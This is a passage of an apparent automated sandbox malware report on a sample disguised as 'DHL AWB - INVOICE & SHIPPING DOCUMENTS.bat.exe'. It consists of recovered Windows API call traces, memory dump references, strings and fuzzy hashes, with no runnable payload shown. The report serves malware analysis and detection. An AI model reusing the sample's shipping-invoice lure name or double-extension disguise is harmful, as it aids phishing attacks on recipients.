                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                            • SetCursor.USER32(00000000), ref: 004046AC
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                            • SendMessageA.USER32(?,00000000,00000000), ref: 004046EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: Call$N$cD@
                                            • API String ID: 3103080414-3938186718
                                            • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                            • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,Traveskoens Setup,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F$Traveskoens Setup
                                            • API String ID: 941294808-3973392805
                                            • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                            • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                            • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                            • wsprintfA.USER32 ref: 00405F6B
                                            • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,?,0042C618,?,?,?,?,?), ref: 00405FA6
                                            • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405FB5
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                            • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                            • GlobalFree.KERNEL32(00000000), ref: 00406054
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,80000000,00000003,?,?,00403722,?,?,?,0000000A,?), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,?,0000000A,?), ref: 00405E46
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %s=%s$[Rename]
                                            • API String ID: 2171350718-1727408572
                                            • Opcode ID: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                            • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                            • Opcode Fuzzy Hash: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                            • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 004065DF
                                            • CharNextA.USER32(?,?,?,00000000,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 004065EC
                                            • CharNextA.USER32(?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 004065F1
                                            • CharPrevA.USER32(?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 00406601
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                            • *?|<>/":, xrefs: 004065CF
                                            • "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe", xrefs: 00406587
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-2944388589
                                            • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                            • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                            • GetSysColor.USER32(00000000), ref: 004043EF
                                            • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                            • SetBkMode.GDI32(?,?), ref: 00404407
                                            • GetSysColor.USER32(?), ref: 0040441A
                                            • SetBkColor.GDI32(?,?), ref: 0040442A
                                            • DeleteObject.GDI32(?), ref: 00404444
                                            • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                            • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                            APIs
                                              • Part of subcall function 6F7A12A5: GlobalAlloc.KERNELBASE(?,6F7A12C3,?,6F7A135F,-6F7A504B,6F7A11C0,-000000A0), ref: 6F7A12AD
                                            • GlobalFree.KERNEL32(?), ref: 6F7A266E
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A26A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 703e81514da8951e432c96c662c2f27e5698ced2c6bf9b2b44ee9aa7bb477f29
                                            • Instruction ID: 16f89244b73ebef6e2955c36e8ff087ea477b9c74afff3bea8f8e3a0cf8a4945
                                            • Opcode Fuzzy Hash: 703e81514da8951e432c96c662c2f27e5698ced2c6bf9b2b44ee9aa7bb477f29
                                            • Instruction Fuzzy Hash: C2418E71509640EFD7058F69CE88C2F77BAFBC6314B1747BAF54086550CB32A825DBA1
                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                            • GetMessagePos.USER32 ref: 00404CA3
                                            • ScreenToClient.USER32(?,?), ref: 00404CBD
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                            • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                            APIs
                                            • GetDC.USER32(?), ref: 00401E5D
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                            • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                            • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Tahoma
                                            • API String ID: 3808545654-3580928618
                                            • Opcode ID: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                            • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                            • Opcode Fuzzy Hash: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                            • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                            • MulDiv.KERNEL32(0007CAC4,?,0007CAC8), ref: 00402E90
                                            • wsprintfA.USER32 ref: 00402EA0
                                            • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E9A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                            • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                            • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                            • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A24D7
                                              • Part of subcall function 6F7A12B4: lstrcpynA.KERNEL32(00000000,?,6F7A135F,-6F7A504B,6F7A11C0,-000000A0), ref: 6F7A12C4
                                            • GlobalAlloc.KERNEL32(?,?), ref: 6F7A2452
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6F7A2467
                                            • GlobalAlloc.KERNEL32(?,?), ref: 6F7A2478
                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 6F7A2486
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A248D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                            • String ID:
                                            • API String ID: 3730416702-0
                                            • Opcode ID: 0dc4fbf87a79fc0d9be946b94c2b6f1426b573d6ff78f1c311680da29acb3e0c
                                            • Instruction ID: a251a4fe63a3b6d388e920b595a15c00765db5e615c34b8d54da4b13339fe47e
                                            • Opcode Fuzzy Hash: 0dc4fbf87a79fc0d9be946b94c2b6f1426b573d6ff78f1c311680da29acb3e0c
                                            • Instruction Fuzzy Hash: A1419171509B00DFE7108F2AAA44B6A73F8FF82311F124B6EF545CA580D7B2E954CBA1
                                            APIs
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,80000000,00000003,?,?,00403722,?,?,?,0000000A,?), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,?,0000000A,?), ref: 00405E46
                                            • GlobalAlloc.KERNEL32(?,?), ref: 0040286E
                                              • Part of subcall function 00403390: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,?,0000000A,?), ref: 0040339E
                                            • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040288A
                                            • GlobalFree.KERNEL32(?), ref: 004028C9
                                            • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                              • Part of subcall function 00403168: GetTickCount.KERNEL32 ref: 004031CF
                                              • Part of subcall function 00403168: GetTickCount.KERNEL32 ref: 00403276
                                              • Part of subcall function 00403168: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 0040329F
                                              • Part of subcall function 00403168: wsprintfA.USER32 ref: 004032AF
                                            • CloseHandle.KERNEL32(?,?,?), ref: 004028F8
                                            • DeleteFileA.KERNEL32(?), ref: 0040290B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                            • String ID:
                                            • API String ID: 2082585436-0
                                            • Opcode ID: 4de34a0584c9f07ca01e631d387470c66e36086a4f72a89d30526263dc69d697
                                            • Instruction ID: ef30041e15382934485b3a1dbcd939e881a8f40863dcc9ce189fd72ebc1ad175
                                            • Opcode Fuzzy Hash: 4de34a0584c9f07ca01e631d387470c66e36086a4f72a89d30526263dc69d697
                                            • Instruction Fuzzy Hash: B8213972C00128BBDF216FA5DD8899EBE79BF04364F10823AF554B62E0CB7949419F68
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401DA3
                                            • GetClientRect.USER32(?,?), ref: 00401DF1
                                            • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                            • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                            • DeleteObject.GDI32(00000000), ref: 00401E45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
